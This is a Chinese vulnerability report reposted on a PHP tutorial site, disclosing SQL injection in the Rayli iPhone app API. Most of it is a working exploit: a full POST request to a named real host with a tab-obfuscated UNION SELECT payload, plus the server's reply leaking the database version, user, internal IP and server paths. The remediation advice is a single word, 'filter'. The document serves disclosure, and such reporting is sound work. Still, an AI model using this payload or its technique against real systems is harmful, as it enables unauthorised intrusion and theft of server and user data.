来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 瑞丽网IPHONE端 APP应用接口存在注入,可能会导致用户信息受到威胁,通过漏洞可以通过变量读取服务器信息,望管理员速度修复,防止被他人恶意利用。POST rlw getTopic php HTTP 1 1Host: api r...
|
瑞丽网IPHONE端 APP应用接口存在注入,可能会导致用户信息受到威胁,通过漏洞可以通过变量读取服务器信息,望管理员速度修复,防止被他人恶意利用。
POST /rlw/getTopic.php HTTP/1.1 Host: api.rayli.com.cn Proxy-Connection: close Accept-Encoding: gzip Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 61 Connection: close User-Agent: 2.1.0 (iPhone; iPhone OS 7.0.4; zh_CN) signature=c5836614c6ea63dbfe0667fdb02b2601&version=210&id=18%09%09And%091=2%09UNION%09all%09SELECT%091,CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user(),@@group_concat_max_len,@@dAtadir,@@tmpDir,@@baseDir)%09,1,1,1,1,1,1%09%23
{"result":{"code":"1","message":"\u6210\u529f"},"topic":{"id":"1","title":"pc-linux-gnu : 5.1.40-log : wap@192.168.0.135 : wap_correct : wap@192.168.0.135 : 1024 : \/date\/mysql\/ : \/tmp : \/usr\/local\/mysql-5.1.40-linux-i686-icc-glibc23\/","intro":"1","pubtime":"1","logo":"http:\/\/wap.rayliimg.cn\/rlwarticle\/1","img":"http:\/\/wap.rayliimg.cn\/rlwarticle\/1","part":[]}}
修复方案:
这次跟之前的不是一个文件,其它接口应该还有存在的问题,有时间在给你们寻找提交一下,过滤! 求礼物!^-^ 寻找BUG纯粹为了换乌云币,没有其它意图。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
